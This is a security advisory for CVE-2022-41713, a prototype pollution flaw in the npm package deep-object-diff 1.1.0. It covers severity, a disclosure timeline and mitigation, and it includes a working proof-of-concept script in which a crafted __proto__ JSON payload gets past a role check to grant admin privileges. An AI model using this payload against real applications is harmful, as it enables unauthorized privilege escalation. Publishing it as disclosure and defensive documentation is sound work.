

Advisories

deep-object-diff 1.1.0 - Prototype Pollution

7,3

High

Discovered by

Carlos Bello

Offensive Team, Fluid Attacks

Summary

Full name

deep-object-diff 1.1.0 - Prototype Pollution

Code name

Heldens

State

Public

Release date

15 nov 2022

Affected product

deep-object-diff

Affected version(s)

Version 1.1.0

Vulnerability name

Prototype Pollution

Vulnerability type

390. Prototype Pollution

Remotely exploitable

Yes

CVSS v3.1 vector string

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CVSS v3.1 base score

7.3

Exploit available

Yes

CVE ID(s)

CVE-2022-41713

Description

Version 1.1.0 of deep-object-diff allows an external attacker to edit or add new properties to an object. This is possible because the application does not properly validate incoming JSON keys, thus allowing the __proto__ property to be edited.

Vulnerability

Prototype pollution is a vulnerability that affects JS. It occurs when a third party manages to modify the __proto__ of an object. JavaScript first checks if such a method/attribute exists in the object. If so, then it calls it. If not, it looks in the object's prototype. If the method/attribute is also not in the object's prototype, then the property is said to be undefined.

Therefore, if an attacker succeeds in injecting the __proto__ property into an object, he will succeed in injecting or editing its properties.

Exploitation

exploit.js

import { diff, addedDiff, deletedDiff, updatedDiff, detailedDiff } from 'deep-object-diff';

let admin = {name: "admin", role:"admin"};
let user = {role:"user"};

let normal_user_request = JSON.parse('{"name":"user","role":"admin"}');
let malicious_user_request = JSON.parse('{"name":"user","__proto__":{"role":"admin"}}');

const create_user = (new_user) => {
    // A user cannot alter his role. This way we prevent privilege escalations.
    if(new_user?.role && new_user?.role.toLowerCase() === "admin") {
        throw "Unauthorized Action";
    }
    user = addedDiff(user, new_user);
    console.log(user?.role);
}

try {
    create_user(normal_user_request);
} catch (error) {
    console.log(error);
}
finally {
    create_user(malicious_user_request);
}

Evidence of exploitation

Our security policy

We have reserved the CVE-2022-41713 to refer to this issue from now on. Disclosure policy

System Information

Version: deep-object-diff 1.1.0
Operating System: GNU/Linux

Mitigation

An updated version of deep-object-diff is available at the vendor page.

References

Vendor page https://github.com/mattphillips/deep-object-diff
Issue https://github.com/mattphillips/deep-object-diff/issues/85

Timeline



IA generativa

5 oct 2022



Vendor Confirmed Vuln.

5 oct 2022



Vulnerability patched

12 nov 2022



Vendor contacted

5 oct 2022



Vendor replied

5 oct 2022



Public disclosure

15 nov 2022

Inicia tu prueba gratuita de 21 días

Descubre los beneficios de nuestra solución Hacking Continuo, de la que ya disfrutan empresas de todos los tamaños.

Prueba gratis

Contactar a ventas

Inicia tu prueba gratuita de 21 días

Descubre los beneficios de nuestra solución Hacking Continuo, de la que ya disfrutan empresas de todos los tamaños.

Prueba gratis

Contactar a ventas

Inicia tu prueba gratuita de 21 días

Descubre los beneficios de nuestra solución Hacking Continuo, de la que ya disfrutan empresas de todos los tamaños.

Prueba gratis

Contactar a ventas

Solución

Planes

Recursos

Advisories

Compañía

Select Language



Contactar a ventas

Iniciar sesión

Prueba gratis

Select Language



Contactar a ventas

Prueba gratis

Solución

Planes

Recursos

Advisories

Compañía

Select Language



Contactar a ventas

Iniciar sesión

Prueba gratis

Select Language



Las soluciones de Fluid Attacks permiten a las organizaciones identificar, priorizar y remediar vulnerabilidades en su software a lo largo del SDLC. Con el apoyo de la IA, herramientas automatizadas y pentesters, Fluid Attacks acelera la mitigación de la exposición al riesgo de las empresas y fortalece su postura de ciberseguridad.